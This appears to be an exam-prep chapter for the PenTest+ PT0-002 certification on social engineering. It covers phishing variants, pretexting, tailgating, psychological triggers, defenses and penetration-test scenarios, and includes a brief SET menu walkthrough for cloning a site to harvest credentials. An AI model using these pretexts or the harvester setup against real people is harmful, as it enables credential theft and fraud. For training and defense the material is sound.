This chapter covers social engineering attacks, a critical component of the PT0-002 exam's 'Attacks and Exploits' domain (Objective 3.3). Social engineering exploits human psychology rather than technical vulnerabilities, making it one of the most effective and dangerous attack vectors. Expect approximately 10-15% of exam questions to touch on social engineering principles, techniques, and defenses, including phishing, pretexting, and tailgating.
Jump to a section
Social engineering is like a con artist following a carefully rehearsed script to gain access to a secured building. The con artist first researches the target—learning employee names, company jargon, and even the coffee brand in the break room. This is the reconnaissance phase. Then, they choose a pretext: posing as an IT support technician who needs to 'verify credentials' due to a server breach. They call the front desk, using the employee names they found on LinkedIn, and speak with confidence and urgency. The receptionist, wanting to help, provides the IT director's extension. The con artist then calls the IT director, citing a made-up ticket number, and asks for a password reset 'for security purposes.' The director, flustered by the urgency and the accurate internal jargon, complies. The con artist now has credentials. Just like a con artist relies on human psychology—authority, urgency, and the desire to be helpful—rather than technical exploits, a social engineer manipulates people, not systems. The 'script' is the attack vector; the 'building access' is the compromised account or sensitive information.
What Is Social Engineering and Why Does It Exist?
Social engineering is the psychological manipulation of people into performing actions or divulging confidential information. It exists because the human element is often the weakest link in security. No firewall or encryption can stop a user from willingly handing over their password. The PT0-002 exam emphasizes that social engineering attacks are often the first step in a multi-stage penetration test, used to gain initial access or gather intelligence.
The Social Engineering Attack Cycle
Social engineering follows a predictable cycle: - Reconnaissance: The attacker gathers information about the target from public sources (OSINT) like social media, company websites, and job postings. This includes employee names, email formats, organizational structure, and even personal interests. - Pretexting: The attacker creates a fabricated scenario (pretext) to engage the target. This could be impersonating a help desk technician, a vendor, or a fellow employee. - Engagement: The attacker initiates contact via phone, email, in-person, or social media. They use psychological triggers such as authority, urgency, scarcity, or reciprocity. - Exploitation: The target performs the desired action—clicking a link, providing credentials, or granting physical access. - Execution: The attacker uses the obtained information or access to achieve their objective, such as installing malware or exfiltrating data.
Types of Social Engineering Attacks
#### Phishing Phishing is the most common social engineering attack, typically delivered via email. The attacker sends a message that appears to come from a legitimate source (e.g., a bank, IT department, or colleague) with the goal of stealing credentials or deploying malware. - Spear Phishing: Targeted phishing aimed at a specific individual or organization. The attacker customizes the message using reconnaissance data (e.g., "Hi John, I saw your post about the server migration..."). - Whaling: Spear phishing targeting high-profile individuals like executives or CFOs. The pretext often involves legal or financial urgency. - Vishing (Voice Phishing): Phishing conducted over the phone. The attacker may spoof caller ID to appear as a trusted entity. - Smishing (SMS Phishing): Phishing via SMS text messages. Common pretexts include package delivery notifications or account alerts. - Pharming: Redirecting users from a legitimate website to a fraudulent one, often via DNS poisoning or malicious browser extensions.
#### Pretexting Pretexting involves creating a fabricated scenario to obtain information. For example, an attacker might call an employee posing as an IT auditor and ask for network configuration details. The success of pretexting relies on the attacker's ability to establish credibility through research and confident delivery.
#### Baiting Baiting offers something enticing (e.g., a free USB drive labeled "Employee Bonuses") in exchange for information or access. The victim picks up the USB and plugs it into their computer, which then installs malware.
#### Tailgating (Piggybacking) Tailgating is physically following an authorized person into a restricted area without proper authentication. The attacker may pretend to have forgotten their badge or carry heavy boxes to appear legitimate.
#### Quid Pro Quo Quid pro quo offers a service or benefit in exchange for information. For example, an attacker posing as IT support offers to fix a non-existent computer issue in exchange for the user's password.
#### Watering Hole Attack A watering hole attack compromises a website frequently visited by the target group (e.g., a industry forum). When the target visits the site, malware is delivered via a drive-by download.
#### Impersonation Impersonation involves pretending to be someone else—a coworker, a vendor, or a law enforcement officer—to gain trust. This can be done in person, over the phone, or via email.
Psychological Principles Exploited
Authority: People tend to comply with requests from authority figures (e.g., "This is the CEO's office, I need the financial reports immediately").
Urgency: Creating a sense of urgency bypasses rational thinking (e.g., "Your account will be locked in 24 hours unless you verify now").
Scarcity: Offering something limited (e.g., "Only the first 50 respondents get a free gift") prompts quick action.
Social Proof: People follow the actions of others (e.g., "All your colleagues have already updated their passwords").
Liking: People are more likely to comply with requests from individuals they like (e.g., an attacker who mirrors the victim's interests).
Reciprocity: People feel obligated to return a favor (e.g., sending a small gift before asking for information).
Consistency: People tend to act consistently with their previous commitments (e.g., "You agreed to help with security, so please provide your password").
Social Engineering in Penetration Testing
On the PT0-002 exam, you must understand how social engineering fits into a penetration test. The PenTest+ methodology includes: - Planning and Scoping: Define rules of engagement (e.g., is phishing allowed? Are there restrictions on pretexting?). - Information Gathering and Vulnerability Identification: Use OSINT to identify targets and gather pretext material. - Attacks and Exploits: Execute social engineering attacks (e.g., send phishing emails, make vishing calls). - Reporting and Communication: Document findings and provide recommendations.
Penetration testers often use specialized tools: - Social Engineering Toolkit (SET): A framework for automating phishing attacks, credential harvesting, and more. - GoPhish: An open-source phishing framework for creating and tracking campaigns. - BeEF (Browser Exploitation Framework): Used to hook browsers via social engineering. - Maltego: For OSINT gathering and relationship mapping.
Defenses Against Social Engineering
Security Awareness Training: Regular training on recognizing phishing attempts, pretexting, and other tactics. Simulated phishing campaigns are common.
Policies and Procedures: Clear guidelines for verifying identity (e.g., "Never give out passwords over the phone").
Technical Controls: Email filtering, multi-factor authentication (MFA), and web filtering can reduce the impact of successful social engineering.
Physical Security: Badge readers, mantrap systems, and visitor logs prevent tailgating.
Incident Response: Procedures for reporting suspected social engineering attempts.
Interaction with Other Technologies
Social engineering often bypasses technical controls. For example, even with MFA, an attacker who tricks a user into approving a push notification can gain access. Social engineering is also used in conjunction with other attack types, such as: - Credential Harvesting: Phishing pages that capture usernames and passwords. - Malware Delivery: Phishing emails with malicious attachments or links. - Business Email Compromise (BEC): Impersonating executives to authorize fraudulent wire transfers.
Key Exam Values and Defaults
Phishing success rates: Typically 5-30% depending on targeting.
SET default listener port: 80 for HTTP, 443 for HTTPS.
GoPhish default admin port: 3333.
Common phishing email open rates: 20-40%.
Click-through rates: 10-20% for generic phishing, higher for spear phishing.
Verification Commands (Linux)
To set up a phishing server with SET:
sudo setoolkit
# Select 1) Social-Engineering Attacks
# Select 2) Website Attack Vectors
# Select 3) Credential Harvester Attack Method
# Select 2) Site Cloner
# Enter target URLTo start GoPhish:
./gophish
# Admin interface at https://localhost:3333Summary
Social engineering is a human-focused attack that exploits psychological vulnerabilities. For the PT0-002 exam, know the attack types (phishing, pretexting, baiting, tailgating, quid pro quo, watering hole, impersonation), the psychological principles (authority, urgency, scarcity, social proof, liking, reciprocity, consistency), and the phases of a social engineering attack (reconnaissance, pretexting, engagement, exploitation, execution). Be familiar with tools like SET and GoPhish, and understand how social engineering fits into the penetration testing lifecycle.
Reconnaissance and Target Selection
The attacker gathers information about the target organization and potential victims. Sources include LinkedIn, company websites, job postings, social media, and data breaches. The attacker identifies key personnel (e.g., IT staff, executives) and learns company terminology, email formats, and internal processes. This phase determines the pretext and attack vector. For example, finding that the company uses a specific HR portal allows the attacker to craft a convincing phishing email about 'HR benefits updates.' The depth of reconnaissance directly impacts attack success.
Pretext Development
Using the gathered intelligence, the attacker creates a believable scenario. For a vishing attack, the attacker might pose as a help desk technician calling about a 'security patch.' The pretext includes specific details—like the target's name, department, and recent IT tickets—to establish credibility. The attacker rehearses the script, anticipating questions. For phishing, the pretext is embedded in the email body, often referencing real events (e.g., 'Your package from Amazon is delayed'). The goal is to make the target feel the request is legitimate and urgent.
Engagement and Psychological Manipulation
The attacker initiates contact using the chosen vector (email, phone, in-person). During engagement, they apply psychological triggers: authority (impersonating a manager), urgency (limited-time offer), or reciprocity (offering a small favor). The attacker maintains a confident tone and uses technical jargon appropriate to the pretext. For example, a vishing attacker might say, 'I'm from the IT security team. We detected a breach on your machine. I need you to run this command to verify your system.' The target, feeling pressured, complies without thinking critically.
Exploitation and Information Gathering
The target performs the desired action, such as clicking a link, providing credentials, or allowing physical access. In a phishing attack, the target enters their username and password on a fake login page, which the attacker captures. In a tailgating scenario, the target holds the door for the attacker. The attacker may also install malware (e.g., via a malicious USB) or extract sensitive information over the phone. This step yields the objective: credentials, data, or access.
Post-Exploitation and Covering Tracks
After obtaining the desired information, the attacker may use it for further attacks (e.g., logging into email, pivoting to other systems) or exfiltrate data immediately. To avoid detection, the attacker deletes logs, removes phishing pages, and uses anonymizing tools (e.g., VPNs, Tor). In a penetration test, the tester documents the findings and may demonstrate the impact. The final step is reporting, including recommendations for mitigating similar attacks in the future.
Scenario 1: Spear Phishing Attack on a Financial Institution
A penetration testing firm was hired to assess the security of a mid-sized bank. The tester used OSINT to identify the CFO, Sarah, and learned from LinkedIn that she was attending a financial conference. The tester crafted a spear-phishing email posing as the conference organizer, requesting Sarah to 'confirm her registration' by clicking a link. The link led to a fake login page mimicking the conference portal. Sarah entered her corporate email credentials, which the tester captured. Using those credentials, the tester accessed the bank's email system and found a spreadsheet with wire transfer details. The test demonstrated that even a single compromised executive account could lead to significant data exposure. The remediation included implementing MFA and conducting security awareness training focused on spear phishing.
Scenario 2: Tailgating and Physical Access at a Tech Company
During a physical penetration test, the tester arrived at the company's lobby carrying a large box labeled 'IT Equipment.' The tester waited for an employee to badge in, then asked, 'Could you hold the door? I have my hands full.' The employee complied, and the tester gained access to the secure office area. Once inside, the tester plugged a Raspberry Pi into an unused network jack, which provided remote access to the internal network from outside. The company had no mantrap or visitor escort policy. The fix was to implement a mantrap system and enforce a strict policy that all visitors must be escorted, even if they appear to be employees.
Scenario 3: Vishing Attack on a Healthcare Provider
An attacker called the help desk of a hospital, posing as a doctor who had forgotten his password. The attacker used a spoofed caller ID that matched the hospital's main number. The help desk technician, following procedure, asked for the doctor's employee ID. The attacker provided an ID obtained from a discarded hospital newsletter. The technician reset the password and gave the new temporary password over the phone. The attacker then logged into the hospital's system and accessed patient records. This incident led to a HIPAA violation. The hospital implemented a callback verification process and prohibited password resets over the phone.
Common Misconfigurations and Pitfalls
Over-reliance on technology: Companies invest in firewalls and IDS but neglect user training. Social engineering bypasses technical controls.
Inconsistent policies: Some departments enforce verification, others don't. Attackers exploit the weakest link.
Failure to update training: Phishing techniques evolve; annual training is insufficient. Continuous simulated phishing is more effective.
Not reporting incidents: Employees may feel embarrassed and fail to report attempted attacks, allowing attackers to refine their methods.
What PT0-002 Tests on Social Engineering (Objective 3.3)
The exam focuses on your ability to identify different types of social engineering attacks and the psychological principles behind them. Specifically, you must:
Distinguish between phishing, spear phishing, whaling, vishing, smishing, and pharming.
Recognize pretexting, baiting, tailgating, quid pro quo, and watering hole attacks.
Understand the role of social engineering in the penetration testing lifecycle.
Know the tools used (SET, GoPhish, BeEF, Maltego).
Apply appropriate defenses and countermeasures.
Common Wrong Answers and Why Candidates Choose Them
Confusing phishing with pharming: Candidates often think pharming is just a type of phishing. In reality, pharming redirects users to fake websites via DNS poisoning or malicious code, without requiring the user to click a link. The wrong answer might say 'pharming uses deceptive emails,' which is incorrect.
Mixing up pretexting and baiting: Pretexting involves a fabricated scenario (e.g., 'I'm from IT, I need your password'), while baiting offers something enticing (e.g., a free USB). The wrong answer might describe a USB drop as pretexting.
Forgetting that social engineering can be physical: Some candidates only think of digital attacks. Tailgating and impersonation are physical social engineering. The exam may describe a scenario where an attacker follows an employee into a building—that's tailgating, not phishing.
Underestimating the importance of OSINT: Candidates may not realize that reconnaissance is the foundation of social engineering. The exam might ask which step comes first—the answer is reconnaissance.
Specific Numbers and Terms to Memorize
SET default ports: 80 (HTTP), 443 (HTTPS).
GoPhish admin port: 3333.
Phishing click-through rates: Typically 10-20% for generic, higher for spear.
BEC (Business Email Compromise): A type of impersonation attack targeting wire transfers.
MFA: Multi-factor authentication can mitigate credential theft but not all social engineering (e.g., tailgating).
Edge Cases and Exceptions
Social engineering via social media: Attackers may use fake profiles to befriend employees and extract information over time.
Reverse social engineering: The attacker makes themselves known as a helpful person (e.g., IT support) and waits for victims to contact them.
Insider threats: Social engineering can be used by malicious insiders who already have some access.
How to Eliminate Wrong Answers
If the scenario involves a phone call, it's vishing, not phishing.
If the scenario involves a USB drive left in the parking lot, it's baiting.
If the scenario involves an attacker claiming to be from IT and asking for a password, it's pretexting.
If the scenario involves an email with a link to a fake login page, it's phishing (or spear phishing if targeted).
Use the psychological trigger: urgency? authority? reciprocity? Match the attack to the principle.
Social engineering exploits human psychology, not technical vulnerabilities.
The five phases of a social engineering attack: reconnaissance, pretexting, engagement, exploitation, post-exploitation.
Common attack types: phishing, spear phishing, whaling, vishing, smishing, pharming, pretexting, baiting, tailgating, quid pro quo, watering hole, impersonation.
Psychological principles: authority, urgency, scarcity, social proof, liking, reciprocity, consistency.
Tools: Social Engineering Toolkit (SET), GoPhish, BeEF, Maltego.
Defenses: security awareness training, policies, MFA, email filtering, physical security controls.
On the PT0-002 exam, be able to identify the attack type from a scenario and suggest appropriate countermeasures.
Social engineering is often the first step in a penetration test to gain initial access.
These come up on the exam all the time. Here's how to tell them apart.
Phishing
Sent to a large number of recipients indiscriminately.
Uses generic language and pretexts (e.g., 'Dear Customer').
Lower success rate (typically 5-10% click-through).
Easier to detect by email filters due to mass mailing patterns.
Often used for broad credential harvesting or malware distribution.
Spear Phishing
Targeted at a specific individual or organization.
Uses personalized information (e.g., recipient's name, job role, recent activities).
Higher success rate (20-50% click-through).
Harder to detect because it appears more legitimate.
Often used for gaining access to high-value accounts or systems.
Mistake
Social engineering only happens via email.
Correct
Social engineering can occur via phone (vishing), SMS (smishing), in person (tailgating, impersonation), or via social media. The PT0-002 exam tests all vectors.
Mistake
Multi-factor authentication (MFA) completely prevents social engineering.
Correct
MFA can prevent credential theft but does not stop tailgating, baiting, or vishing that tricks users into approving MFA prompts (MFA fatigue attacks).
Mistake
Phishing and spear phishing are the same thing.
Correct
Spear phishing is a targeted form of phishing aimed at a specific individual or organization, using personalized information. Generic phishing is sent to many recipients without customization.
Mistake
Social engineering attacks are always obvious to the victim.
Correct
Well-crafted social engineering attacks are often not obvious. Attackers use research and psychological manipulation to appear legitimate.
Mistake
Only low-level employees fall for social engineering.
Correct
Executives and high-level employees can be targeted (whaling) and may be more susceptible due to their access to sensitive information and tendency to bypass security protocols.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
Phishing is conducted via email, while vishing (voice phishing) is conducted over the phone. Both aim to trick victims into revealing sensitive information. The exam may describe a scenario where an attacker calls a user pretending to be from IT—that's vishing. If the attacker sends an email with a malicious link, it's phishing.
Pretexting involves creating a fabricated scenario (pretext) to obtain information, such as impersonating a help desk technician. Baiting offers something enticing (e.g., a free USB drive) to trick the victim. The key difference: pretexting relies on a story, while baiting relies on a physical or digital lure.
SET is an open-source Python framework for automating social engineering attacks. It includes modules for spear phishing, credential harvesting, website cloning, and more. Penetration testers use SET to simulate attacks. On the exam, know that SET can clone websites and capture credentials.
Yes, through techniques like MFA fatigue attacks (repeatedly sending push notifications until the user approves) or vishing where the attacker asks for the MFA code. Social engineering can also trick users into providing their password and then the attacker uses it to log in and trigger an MFA prompt that the user approves.
The best defenses are physical security controls like mantrap systems (two interlocking doors that prevent more than one person from entering at a time), strict visitor escort policies, and security awareness training that encourages employees to challenge strangers. On the exam, tailgating is often mitigated by a mantrap.
A watering hole attack compromises a website that the target group frequently visits (e.g., an industry forum). The attacker injects malicious code that delivers malware to visitors. Unlike phishing, the attacker does not directly contact the target; they wait for the target to come to the compromised site.
BEC is a type of impersonation attack where the attacker poses as a company executive (often the CEO) and sends an email to an employee (e.g., in finance) requesting an urgent wire transfer. It relies on social engineering principles of authority and urgency. BEC is a form of spear phishing.
You've just covered Social Engineering Attacks — now see how well it sticks with free PT0-002 practice questions. Full explanations included, no account needed.
Done with this chapter?